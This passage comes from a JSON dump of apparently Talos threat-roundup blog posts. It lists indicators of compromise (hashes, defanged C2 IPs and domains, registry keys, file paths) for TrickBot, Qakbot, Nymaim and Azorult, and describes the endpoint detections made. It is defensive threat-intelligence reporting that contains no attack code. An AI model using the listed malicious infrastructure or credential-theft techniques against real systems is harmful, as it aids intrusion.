\n`%ProgramFiles%\\Windows Defender\\MpClient.dll:!` | 31 \n`%ProgramFiles%\\Windows Defender\\MpCmdRun.exe:!` | 31 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0157ed115b5bf4c7be57c400db2d0565f5ad1b6df2bb63d85ca04932d190f83a 02deef08e12b0ca6d311bd47d984587fc2eacee659bccd5b03f470d04baf7fda 05e354a637fc39a732a2042d70be6d4ff0d7250f746a89bda5833787b1d73f77 05e9764e72fd580377b26682b329ede539bab36a7c651f17e78bfed628f29236 070a5d1c0a35171169531caa0583f46ef8ce39d8e8a5f4806ea0060a8311e3c2 08a22538c4474de9d510516b31169eb4bbcb111333f45463387540ee1c802094 094f81ace5dc69455869040c8306a5c89ed318a0209feb9883c65dedfaa1607a 1078cbea870ad246012c3e5d7383a34b73b71d743b8a7814b916afb22dafc052 12092b610aec4b3a4abd1704aa5ca7796afb88ed2d62813f64e69813179bf17e 13297a1a4dae8afcae7683ca66825a041fde54b3a34347c5ae9cd1ca540bfe65 15c92af968516aa50e2434d678099993d616322ed64c28fbedbdf9f58f688cfe 1ccece616c3bf43763c2f4159894df3170e8e017359a432fcf574df86ed4d9c9 1ddede2f503ec591648dee15162794cc8c44bc39b40aaa209a344c4d8741b59e 1e40c41b83c1dfdcf4f62b52a3248f7de7d14e9d20c622f3d58b56e873e90ada 1e6bd842bc6e5a5a27e4c9124f4f8d0cb99bf13fe07f33ae4ebddeaeccddc065 1f213cb034864518007496d9f81834a202e2fbb24f60685c0d38af4127230b7e 23095a64ad977a038141d7a51d9b16fffb690671c4cba65f4aa9cab1ead68d9d 245aa365f4df9a087650d523cfb5685f5e0a22faf3948de28e4516ff7574daec 26fc9dad694e24ab9f22f40ecae7b5ce436d3e7f0fdc7c0dc91a33967ed3bcb3 2afc92a8de98e29db880f1bbd0cde81e4cc2e49dce0bdafb5d992511be97dbca 2fbc30feb2a4a8c926b69b762e898bda305d5333a198b2a1304644a1bff6176a 352d14133cb2f89223d15a81fa44442ef7b033b3646b12a92f69d82d27718f67 38257554ec967969a8e114bb6588b63210b83a0a76a7f1cbf0eb17b6e10ab91f 3852da85c0d4541fea5bb3812eaec3b7247aae76c57c6a4ad7271b76d50acb8d 3be059379396caf75330c4f1fa97adc8f5683cba16eeaabcbdd9ccbd8055b748 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-gtTHK2BwDLI/XfPHhlkYIHI/AAAAAAAADB0/TsyqbJlKa5oDKVcR13ybVwsz3YNEaDolACLcBGAsYHQ/s1600/48b5faa2f679ad591adc907663010440d5750c622ad21a867af7f7758a5f1688_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-ojKWn4TDD2M/XfPHmjkS-QI/AAAAAAAADB8/99h-YaNwoX00a1yqNYidDjp23v7xtP9OwCLcBGAsYHQ/s1600/b6e4b57eadb3b2ba6247f35f279cd81403aeb3b6e6b48492f49991668fcdc91f_tg.png>)\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (24000) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (246) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nKovter injection detected \\- (209) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nDealply adware detected \\- (191) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nGamarue malware detected \\- (159) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nExcessively long PowerShell command detected \\- (101) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nInstallcore adware detected \\- (88) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nSpecial Search Offer adware \\- (25) \nSpecial Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware. \nFusion adware detected \\- (20) \nFusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware is known to sometimes download and install malware. \nCorebot malware detected \\- (20) \nCorebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&amp;C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking. \n \n", "modified": "2019-12-13T10:03:26", "published": "2019-12-13T10:03:26", "id": "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YGaS-UxoWJU/threat-roundup-1206-1213.html", "type": "talosblog", "title": "Threat Roundup for December 6 to December 13", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-24T21:27:12", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 17 and Jan. 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/01/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Packed.TrickBot-7541396-1 | Packed | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Dropper.Qakbot-7541405-1 | Dropper | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB. \nWin.Packed.Nymaim-7542552-1 | Packed | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Malware.Azorult-7541464-1 | Malware | Azorult is a banking trojan that attempts to steal credit card data and other sensitive information to facilitate cybercrime. \nDoc.Malware.Emotet-7544675-1 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Worm.Vobfus-7541859-0 | Worm | Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers. \nWin.Trojan.XpertRAT-7550253-1 | Trojan | XpertRAT is a remote access trojan that provides an attacker with the ability to access an infected machine remotely and has the ability to steal sensitive information like usernames and passwords. XpertRAT has been around since 2011 and consists of a core component and multiple modules, all written in Delphi. \nWin.Trojan.Upatre-7549404-0 | Trojan | Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware. \nWin.Packed.Passwordstealera-7544289-0 | Packed | This malware has the ability to harvest stored credentials, keystrokes, screenshots, network activity, and more from computers where the software is installed. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Packed.TrickBot-7541396-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 7 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\PROFILELIST\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: RefCount ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 40 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`95[.]181[.]198[.]151` | 24 \n`79[.]174[.]12[.]245` | 22 \n`195[.]123[.]240[.]81` | 16 \n`185[.]62[.]188[.]83` | 12 \n`181[.]140[.]173[.]186` | 10 \n`5[.]182[.]210[.]109` | 10 \n`185[.]99[.]2[.]149` | 10 \n`85[.]143[.]219[.]230` | 10 \n`23[.]95[.]231[.]187` | 10 \n`176[.]119[.]159[.]204` | 9 \n`198[.]23[.]209[.]201` | 8 \n`5[.]2[.]76[.]122` | 8 \n`146[.]185[.]219[.]31` | 8 \n`198[.]8[.]91[.]10` | 6 \n`92[.]63[.]105[.]138` | 6 \n`5[.]182[.]211[.]44` | 6 \n`164[.]68[.]120[.]60` | 5 \n`181[.]129[.]104[.]139` | 4 \n`51[.]89[.]73[.]159` | 4 \n`216[.]239[.]38[.]21` | 3 \n`181[.]113[.]28[.]146` | 3 \n`176[.]58[.]123[.]25` | 2 \n`116[.]203[.]16[.]95` | 2 \n`52[.]44[.]169[.]135` | 2 \n`52[.]55[.]255[.]113` | 2 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`teene[.]site` | 6 \n`checkip[.]amazonaws[.]com` | 4 \n`api[.]ipify[.]org` | 3 \n`ipinfo[.]io` | 3 \n`ident[.]me` | 2 \n`ip[.]anysrc[.]net` | 2 \n`api[.]ip[.]sb` | 2 \n`ipecho[.]net` | 2 \n`2cdajlnnwxfylth4[.]onion` | 2 \n`www[.]myexternalip[.]com` | 1 \n`250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`myexternalip[.]com` | 1 \n`icanhazip[.]com` | 1 \n`wtfismyip[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\Tasks\\Task Gpu health` | 40 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 40 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 40 \n`None` | 39 \n`%APPDATA%\\DirectTools\\data` | 25 \n`%APPDATA%\\DirectTools\\settings.ini` | 25 \n`%APPDATA%\\gpuhealth` | 15 \n`%APPDATA%\\gpuhealth\\data` | 15 \n`%APPDATA%\\gpuhealth\\settings.ini` | 15 \n`%APPDATA%\\DirectTools\\Data\\pwgrab64` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs\\dpost` | 2 \n`%APPDATA%\\DirectTools\\data\\pwgrab64_configs` | 1 \n \n#### File Hashes\n\n` 0143ebd2f87acf44bf4b8dc9f03ba00e7eff4d2a723e93bfb7c628a83b993f9a 06951826498d418e5f0ca33112d2cb607d738e9ccb08feaa1ce3427bffa22600 06fce1e6e9c3187d9cf087c6fe4034785f1ffaccbe9b500e424dcc03946a83da 0a1a547185e396fa877b82e7cbc716fe682a95588914944246f0b18c8828bf8f 0addc7b9d5e37d663277cdc9c15fa001ed5db6fa59263a5869b5aed99180ef02 0e4b9cea532791a825d4774d95580827667bff1e75f83b936d0e5cc3ab7236e6 16a0f1a7a0fe7277e4ef69b214b48a0c7f6a96fee6c78bf979b92fb97aed3c83 1f42082ee2954a70c60d15886366307ccacbb8080f03daa536e3fae361a46f4d 20ec1ae9bf3e33e2321f10cb230cc543792b94ecfaf358847b6b85e6d03af17f 297e4bd8eb28b69336a5d05abefd50985f7f5161c1bb08dd54a287a85123f856 2a1494652183e00b35e5566123fa3a2b3d73f9ac8a686258b4905a47a5354488 30b023cc4b072dfdef48929f92bbf283d112a92d03698b58b4c4fea402912c82 31ef497ec1ba5f2a858c92732416cff7bc1a1cdfaddef2ec539b09bbf9e83369 34610185ae8d7ccb60c2c536a2a1ed17be1b4741d2f88206f874276309b439ac 364252d2f0111a2d1bb24aaae430f57ae07c6209682b3567d5c99bbc73a2ce26 3826b709fd3add9b91d37828209ca8b8c05aa60ca2c34d82be1f4260b8188f83 38b5cf64a8cb8099d5c24d82ddd981f00941126c53b999906ddab7b4eff05b11 3c4bf379d34de653845d1efc59eb441388e99aa7e72137b5964d74467d58013f 3e206f84c4467a51a246ada113646b8dd79aebec8b2ecbd515434335db48f6f0 4172720904201256e209df95026384a4a46c1cd5f7910aa7d309633b747e37da 45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3 47e90d2bd50809df1e9b1b8bc97883dbfa277a760914179cc8f8e54b58290852 4d13f83b56a619c0c34d5fa2fd1c3376ed3c3b837d626599983be29a0e31cc00 4d3eb4806824008f979eae543f41cc90e1e7dd47d95b70bb98984454974d0865 52e86752e9af7aec9c31ea3f3bb224ad02966c11bf7ef73e0eeaf4c247fd2a51 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IXC1NLLbMZI/XitNDG_iMSI/AAAAAAAADKU/EiPEs5oggmAuNSLeWX7POoNbaThxoGVfQCLcBGAsYHQ/s1600/45a2a54c9228d8aef0ef8599c21b2b51bb4163aa02982a205c2fee36c9ffd5e3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Qakbot-7541405-1\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`ocmwn` | 22 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 22 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 22 \n`\\TEMP\\437d5b4d9e4c5d8ab4615871f9e7830c.exe` | 1 \n`\\TEMP\\385ece7d547122fba5d712c7495a6721.exe` | 1 \n`\\TEMP\\c09a343a545e0f9e36444a847e3ad5ac.exe` | 1 \n`\\TEMP\\c78811efdd2612e5ca25249df2cf7600.exe` | 1 \n \n#### File Hashes\n\n` 0aea1de8b679fe547239de586664d4693f8cc6cef89340b3fb161c09630f6b14 1118a488e6f39981fb9b24b1bbf3dcd9c0bde2ca79353ad231427a96e951340e 15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4 1e24651cd82da5234ef6dc48f67ea123889fab0dcfe9d41c9d9e4aaba7016786 1ea2902b3b1245d195b86c48a72ea70591877f99beeb622c20bb8ec672ce2daf 298c9f7d8fb46cbf8d3d59a9b145ebbc1c27cb507e4290cd37f02e6754225ddf 2a389b7f20979df29d32ecbcfb0c290891aea90d483f29f95617c2b06dc72670 3617f78b320d1e2efa260579b7d7df9beb37fc47c4bb7d5f320d7675f18894ed 3754ca2f4e3057827092577b1385fde7f07a53f12c6ddc3d6fd5f0f9d6a1239c 457b9bd110b9ada83477e9e1b578663cc3fa5e9d8d0eea8eb41bca51ed11fe09 4c1c055f423adc3d2eed4a54602bf607ccf2562f498aca8b1f1e7e23e1054373 6e2382936ba75dc342bec4ddee3bfc1f3a608f9dfaf3146c9a23d6e3551d6e3f 8e01ab60655a87bdc2a3b56bdc84a50e1c4079555218f28ff6fdc6e1ac109e92 a73e870268c6baa9b6c1f646b7b56d96655b0e2af784be9b5de3dd618c0e8fde bec8eb12798277e788ee835a6da3873fac69a68fb9796d2f248b9b3162285869 c0a8971ffec59c7987826d4ba03fbe539263b92f90718dbdabf6cc382531e417 c78e50570a2d04460be294f5bf5626d03b21c177aa0271e0597baea65caaa2b2 ca0e1deff6b8bcdb9bd5a170529339c6582e78deaa5153db86098fe65664f7e2 cd64755ab2a51aeeefe9afb202ddc84b7f04570271f27630eaf8ea76811937a0 d119ff32920eb407b85a23c825b67454444c0b5097deae743ab8f774f5416d28 d1c307f7b14523f3fa68fbbe0c41b39c40c3a8a27db996d4b952cb7fc183a42b dd722366c1a992ad2e014c2eacb856e76f7677acee045ed552ae3b2ee05e2e99 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-OnRG3SfoiaQ/XitNpWbndWI/AAAAAAAADKc/1kb4rDsyk74XvBr8Br7qV3AOijLiL1TMgCLcBGAsYHQ/s1600/15a4c8dc1980650038b2e8823807746cadb6f106737719e8e8c14b3fcea0b8d4_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Nymaim-7542552-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 15 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 15 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 15 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 15 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 15 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 15 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 15 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 15 \n`Local\\{888E04DB-EDDB-D2EC-5F32-1719D74FA2E0}` | 15 \n`Local\\{D876A547-0EDD-4A55-0873-9F0D6D3719FB}` | 15 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`fzncuowwstw[.]pw` | 15 \n`wawrgrtjcdr[.]com` | 15 \n`ochirxt[.]net` | 15 \n`klcbberl[.]com` | 15 \n`fxcskhwr[.]in` | 15 \n`vpbcco[.]net` | 15 \n`mrbhs[.]pw` | 15 \n`wiztdyzp[.]com` | 15 \n`eqbrnmigl[.]in` | 15 \n`csuaibcneix[.]net` | 15 \n`lnulxvsvvl[.]pw` | 15 \n`szthbpsn[.]pw` | 15 \n`nokuznpxbypo[.]com` | 15 \n`tthzpuipne[.]pw` | 15 \n`juxrdizkivk[.]net` | 15 \n`hcjihn[.]in` | 1 \n`omcbnlos[.]net` | 1 \n`voxrdn[.]net` | 1 \n`zbztpauc[.]pw` | 1 \n`caojbfvum[.]net` | 1 \n`dkzexx[.]net` | 1 \n`npdcqoxaepfz[.]net` | 1 \n`ljhafrwlf[.]in` | 1 \n`vauordi[.]com` | 1 \n`bfeqxicrqaxp[.]pw` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 15 \n`%ProgramData%\\ph\\fktiipx.ftf` | 15 \n`%TEMP%\\gocf.ksv` | 15 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 15 \n`%TEMP%\\fro.dfx` | 12 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 12 \n`%TEMP%\\bpnb.skg` | 1 \n`%TEMP%\\haqhxh.vsz` | 1 \n`\\Documents and Settings\\All Users\\po\\vikog.axh` | 1 \n \n#### File Hashes\n\n` 13faed74357cf5f5a66983ce864e49d8ab3d16dc0c4c04a95888fe6ff2580b5c 1e22dbdfbcafcef6e91099b7c345a52a4f59a92fe1f8d30e333bce0d92b7c850 2c22e368525024b26e7c7d1058260093a2f380373010e6e387bea75e325c613c 36799b98d45008973435f10c8e1ba40288b92d6199e4ecec16e40e918e44d58d 3f9a8d0d084d4640a73140faf01df696531c0a6d762309655c503718b412a081 4a70f8df27631b3f76c1a6d520aa53983484e442dd79155d20101fae271e98c5 63fe06736f3fe6ef3ae4c58c89cebc9f055872cab247a707490e3c4b41ca8ff7 9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4 a315a6e21350c5a9811f5006b78ffc5906e5f0c2fc1ed31af8bfc7e056f12797 a66e66ef119cb1451ba006a49417432bc8700f096adff827d4ae7bf0dae07a67 acebcce1368e7a969746cae53715768a37620dc2cfd278f4cff2b891c0d9af6c c43573752804b8f215c95dcb4ab87985cfc87010bfe459e9ab836c8dacb86f5c ccd4a7ded8fa23a750dc9437399cdc6f84964fc0fe4106b2df67ad558014b9e9 e0e5fb674a45c8d4515294b2b591860679993da4a2c48f656f206fa874a5cb98 fd65221380cfca194a1dbd9351357ee2fd0c132784385ed1ff3141c5b19a6805 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-X26IWZcqkOs/XitOawbQKHI/AAAAAAAADKk/bwxFxGMmOGMqpgc9tAWQNoXQgOWk5MYZQCLcBGAsYHQ/s1600/9938f7621ae034d3b677c1dbebeb29fe57e1e8a275856aa404d2bca260c808a4_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Azorult-7541464-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\PICTURE ` | 20 \n`<HKCU>\\SOFTWARE\\PICTURE\\PICTUREPROCESSINGTOOLSV1.0 ` | 20 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: GlobalAssocChangedCounter ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayVersion ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMajor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: VersionMinor ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Publisher ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: DisplayIcon ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: UninstallString ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: URLInfoAbout ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: HelpLink ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallLocation ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallSource ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: Language ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoModify ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: NoRepair ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: InstallDate ` | 10 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL\\WOTSUPER 2.1 \nValue Name: EstimatedSize ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Type ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: Start ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: ErrorControl ` | 9 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\BYTEDOWNLOAD PROTECT SERVICE \nValue Name: DisplayName ` | 9 \nMutexes | Occurrences \n---|--- \n`d19ab989-a35f-4710-83df-7b2db7efe7c5{846ee340-7039-11de-9d20-806e6f6e6963}` | 10 \n`A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A` | 10 \n`Global\\<random guid>` | 10 \n`01B1CA98-EE2E-41B3-8A2F-F319643109E5` | 2 \n`None` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`216[.]83[.]52[.]40` | 20 \n`103[.]91[.]210[.]187` | 11 \n`45[.]139[.]236[.]14` | 10 \n`23[.]106[.]124[.]148` | 10 \n`45[.]76[.]18[.]39` | 9 \n`37[.]140[.]192[.]153` | 9 \n`104[.]27[.]185[.]71` | 7 \n`185[.]99[.]133[.]121` | 6 \n`37[.]140[.]192[.]166` | 6 \n`88[.]99[.]66[.]31` | 5 \n`13[.]107[.]21[.]200` | 4 \n`93[.]190[.]142[.]79` | 3 \n`208[.]95[.]112[.]1` | 3 \n`209[.]141[.]34[.]150` | 3 \n`216[.]83[.]52[.]19` | 3 \n`104[.]27[.]184[.]71` | 3 \n`183[.]131[.]207[.]66` | 2 \n`216[.]83[.]52[.]20` | 2 \n`204[.]79[.]197[.]200` | 1 \n`220[.]243[.]236[.]20` | 1 \n`220[.]242[.]158[.]12` | 1 \n`104[.]28[.]10[.]3` | 1 \n`204[.]188[.]226[.]98` | 1 \n`104[.]27[.]171[.]106` | 1 \n`194[.]36[.]188[.]13` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`iplogger[.]org` 